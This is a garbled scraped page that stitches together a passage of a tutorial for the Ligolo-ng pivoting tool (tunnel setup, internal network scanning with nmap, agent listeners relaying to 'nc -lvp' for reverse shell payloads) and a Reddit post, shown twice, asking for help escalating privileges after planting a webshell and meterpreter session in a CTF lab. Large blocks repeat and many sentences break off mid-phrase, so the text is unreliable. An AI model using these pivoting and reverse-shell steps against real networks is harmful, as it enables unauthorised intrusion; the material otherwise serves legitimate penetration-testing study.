? Specify a session : 1 – nchatelain@nworkstation – XX.XX.XX.XX:38000
Display the network configuration of the agent using the
ifconfig command:[Agent : nchatelain@nworkstation] » ifconfig
[…]
┌─────────────────────────────────────────────┐
│ Interface 3 │
├──────────────┬──────────────────────────────┤
│ Name │ wlp3s0 │
│ Hardware MAC │ de:ad:be:ef:ca:fe │
│ MTU │ 1500 │
│ Flags │ up|broadcast|multicast │
│ IPv4 Address │ 192.168.0.30/24 │
└──────────────┴──────────────────────────────┘
Add a route on the proxy/relay server to the 192.168.0.0/24 agent network.[...]
Hacking Articles Tips Tricks Videos Tutorials
Kali Linux TutorialsLigolo-Ng : An Advanced, Yet Simple, Tunneling/Pivoting Tool That Uses A TUN Interface Ligolo-Ng is a simple, lightweight and fast tool that allows pentesters to establish tunnels from a reverse TCP/TLS connection…
$ sudo ip route add 192.168.0.0/24 dev ligolo
Start the tunnel on the proxy:
[Agent : nchatelain@nworkstation] » start
[Agent : nchatelain@nworkstation] » INFO[0690] Starting tunnel to nchatelain@nworkstation
You can now access the 192.168.0.0/24 agent network from the proxy server.
$ nmap 192.168.0.0/24 -v -sV -n
[…]
$ rdesktop 192.168.0.123
[…]
Agent Binding/Listening
You can listen to ports on the agent and redirect connections to your control/proxy server.
In a ligolo session, use the
The following example will create a TCP listening socket on the agent (0.0.0.0:1234) and redirect connections to the 4321 port of the proxy server
[Agent : nchatelain@nworkstation] » listener_add –addr 0.0.0.0:1234 –to 127.0.0.1:4321 –tcp
INFO[1208] Listener created on remote agent!
On the
$ nc -lvp 4321
When a connection is made on the TCP port
This is very useful when using reverse tcp/udp payloads.
You can view currently running listeners using the
[Agent : nchatelain@nworkstation] » listener_list
┌───────────────────────────────────────────────────────────────────────────────┐
│ Active listeners │
├───┬─────────────────────────┬────────────────────────┬────────────────────────┤
│ # │ AGENT │ AGENT LISTENER ADDRESS │ PROXY REDIRECT ADDRESS │
├───┼─────────────────────────┼────────────────────────┼────────────────────────┤
│ 0 │ nchatelain@nworkstation │ 0.0.0.0:1234 │ 127.0.0.1:4321 │
└───┴─────────────────────────┴────────────────────────┴────────────────────────┘
[Agent : nchatelain@nworkstation] » listener_stop 0
INFO[1505] Listener closed.
Does It Require Administrator/Root Access ?
On the agent side, no! Everything can be performed without administrative access.
However, on your relay/proxy server, you need to be able to create a tun interface.
Supported Protocols/Packets
* TCP
* UDP
* ICMP (echo requests)
Performance
You can easily hit more than 100 Mbits/sec. Here is a test using
$ iperf3 -c 10.10.0.1 -p 24483
Connecting to host 10.10.0.1, port 24483
[ 5] local 10.10.0.224 port 50654 connected to 10.10.0.1 port 24483
[ ID] Interval Transfer Bitrate Retr Cwnd
[ 5] 0.00-1.00 sec 12.5 MBytes 105 Mbits/sec 0 164 KBytes
[ 5] 1.00-2.00 sec 12.7 MBytes 107 Mbits/sec 0 263 KBytes
[ 5] 2.00-3.00 sec 12.4 MBytes 104 Mbits/sec 0 263 KBytes
[ 5] 3.00-4.00 sec 12.7 MBytes 106 Mbits/sec 0 263 KBytes
[ 5] 4.00-5.00 sec 13.1 MBytes 110 Mbits/sec 2 134 KBytes
[ 5] 5.00-6.00 sec 13.4 MBytes 113 Mbits/sec 0 147 KBytes
[ 5] 6.00-7.00 sec 12.6 MBytes 105 Mbits/sec 0 158 KBytes
[ 5] 7.00-8.00 sec 12.1 MBytes 101 Mbits/sec 0 173 KBytes
[ 5] 8.00-9.00 sec 12.7 MBytes 106 Mbits/sec 0 182 KBytes
[ 5] 9.00-10.00 sec 12.6 MBytes 106 Mbits/sec 0 188 KBytes
[ ID] Interval Transfer Bitrate Retr
[ 5] 0.00-10.00 sec 127 MBytes 106 Mbits/sec 2 sender
[ 5] 0.00-10.08 sec 125 MBytes 104 Mbits/sec receiver
Caveats
Because the agent is running without privileges, it’s not possible to forward raw packets. When you perform a NMAP SYN-SCAN, a TCP connect() is performed on the agent.
When using nmap, you should use
Download
Start the tunnel on the proxy:
[Agent : nchatelain@nworkstation] » start
[Agent : nchatelain@nworkstation] » INFO[0690] Starting tunnel to nchatelain@nworkstation
You can now access the 192.168.0.0/24 agent network from the proxy server.
$ nmap 192.168.0.0/24 -v -sV -n
[…]
$ rdesktop 192.168.0.123
[…]
Agent Binding/Listening
You can listen to ports on the agent and redirect connections to your control/proxy server.
In a ligolo session, use the
listener_add command.The following example will create a TCP listening socket on the agent (0.0.0.0:1234) and redirect connections to the 4321 port of the proxy server
[Agent : nchatelain@nworkstation] » listener_add –addr 0.0.0.0:1234 –to 127.0.0.1:4321 –tcp
INFO[1208] Listener created on remote agent!
On the
proxy:$ nc -lvp 4321
When a connection is made on the TCP port
1234 of the agent, nc will receive the connection.This is very useful when using reverse tcp/udp payloads.
You can view currently running listeners using the
listener_list command and stop them using the listener_stop [ID] command:[Agent : nchatelain@nworkstation] » listener_list
┌───────────────────────────────────────────────────────────────────────────────┐
│ Active listeners │
├───┬─────────────────────────┬────────────────────────┬────────────────────────┤
│ # │ AGENT │ AGENT LISTENER ADDRESS │ PROXY REDIRECT ADDRESS │
├───┼─────────────────────────┼────────────────────────┼────────────────────────┤
│ 0 │ nchatelain@nworkstation │ 0.0.0.0:1234 │ 127.0.0.1:4321 │
└───┴─────────────────────────┴────────────────────────┴────────────────────────┘
[Agent : nchatelain@nworkstation] » listener_stop 0
INFO[1505] Listener closed.
Does It Require Administrator/Root Access ?
On the agent side, no! Everything can be performed without administrative access.
However, on your relay/proxy server, you need to be able to create a tun interface.
Supported Protocols/Packets
* TCP
* UDP
* ICMP (echo requests)
Performance
You can easily hit more than 100 Mbits/sec. Here is a test using
iperf from a 200Mbits/s server to a 200Mbits/s connection.$ iperf3 -c 10.10.0.1 -p 24483
Connecting to host 10.10.0.1, port 24483
[ 5] local 10.10.0.224 port 50654 connected to 10.10.0.1 port 24483
[ ID] Interval Transfer Bitrate Retr Cwnd
[ 5] 0.00-1.00 sec 12.5 MBytes 105 Mbits/sec 0 164 KBytes
[ 5] 1.00-2.00 sec 12.7 MBytes 107 Mbits/sec 0 263 KBytes
[ 5] 2.00-3.00 sec 12.4 MBytes 104 Mbits/sec 0 263 KBytes
[ 5] 3.00-4.00 sec 12.7 MBytes 106 Mbits/sec 0 263 KBytes
[ 5] 4.00-5.00 sec 13.1 MBytes 110 Mbits/sec 2 134 KBytes
[ 5] 5.00-6.00 sec 13.4 MBytes 113 Mbits/sec 0 147 KBytes
[ 5] 6.00-7.00 sec 12.6 MBytes 105 Mbits/sec 0 158 KBytes
[ 5] 7.00-8.00 sec 12.1 MBytes 101 Mbits/sec 0 173 KBytes
[ 5] 8.00-9.00 sec 12.7 MBytes 106 Mbits/sec 0 182 KBytes
[ 5] 9.00-10.00 sec 12.6 MBytes 106 Mbits/sec 0 188 KBytes
[ ID] Interval Transfer Bitrate Retr
[ 5] 0.00-10.00 sec 127 MBytes 106 Mbits/sec 2 sender
[ 5] 0.00-10.08 sec 125 MBytes 104 Mbits/sec receiver
Caveats
Because the agent is running without privileges, it’s not possible to forward raw packets. When you perform a NMAP SYN-SCAN, a TCP connect() is performed on the agent.
When using nmap, you should use
--unprivileged or -PE to avoid false positives.Download
CTF Help need iis_webdav Credentials cracked
https://www.reddit.com/r/Pentesting/comments/ppvngh/ctf_help_need_iis_webdav_credentials_cracked/
<!-- SC_OFF -->Hey Guys i'm sitting in front of a CTF Lab and i'm stucking for a few days. the Flag is to get the NTLM hash of the Administrator FACTS: - Windows Server 2019
- Port 80 open
- webdav Directory
- cracked credentials of 2 Users (User1 and Administrator)
- uploaded Webshell to webdav directory
- Webshell is running as IIS_AppPool User
- tried metasploit iis_webdav with Credentials of User1 and Administrator (different payloads) always ERROR 500
- created a meterpreter session with uploaded exe started over the webshell NEED: - i need a way to escalate my Privileges to the Administrator User (credentials available)
- tried with some fany runas commands without success what could i try to get the flag? <!-- SC_ON --> submitted by /u/dontask4name (https://www.reddit.com/user/dontask4name)
[link] (https://www.reddit.com/r/Pentesting/comments/ppvngh/ctf_help_need_iis_webdav_credentials_cracked/) [comments] (https://www.reddit.com/r/Pentesting/comments/ppvngh/ctf_help_need_iis_webdav_credentials_cracked/)
https://www.reddit.com/r/Pentesting/comments/ppvngh/ctf_help_need_iis_webdav_credentials_cracked/
<!-- SC_OFF -->Hey Guys i'm sitting in front of a CTF Lab and i'm stucking for a few days. the Flag is to get the NTLM hash of the Administrator FACTS: - Windows Server 2019
- Port 80 open
- webdav Directory
- cracked credentials of 2 Users (User1 and Administrator)
- uploaded Webshell to webdav directory
- Webshell is running as IIS_AppPool User
- tried metasploit iis_webdav with Credentials of User1 and Administrator (different payloads) always ERROR 500
- created a meterpreter session with uploaded exe started over the webshell NEED: - i need a way to escalate my Privileges to the Administrator User (credentials available)
- tried with some fany runas commands without success what could i try to get the flag? <!-- SC_ON --> submitted by /u/dontask4name (https://www.reddit.com/user/dontask4name)
[link] (https://www.reddit.com/r/Pentesting/comments/ppvngh/ctf_help_need_iis_webdav_credentials_cracked/) [comments] (https://www.reddit.com/r/Pentesting/comments/ppvngh/ctf_help_need_iis_webdav_credentials_cracked/)
Hacking Articles Tips Tricks Videos Tutorials
Photo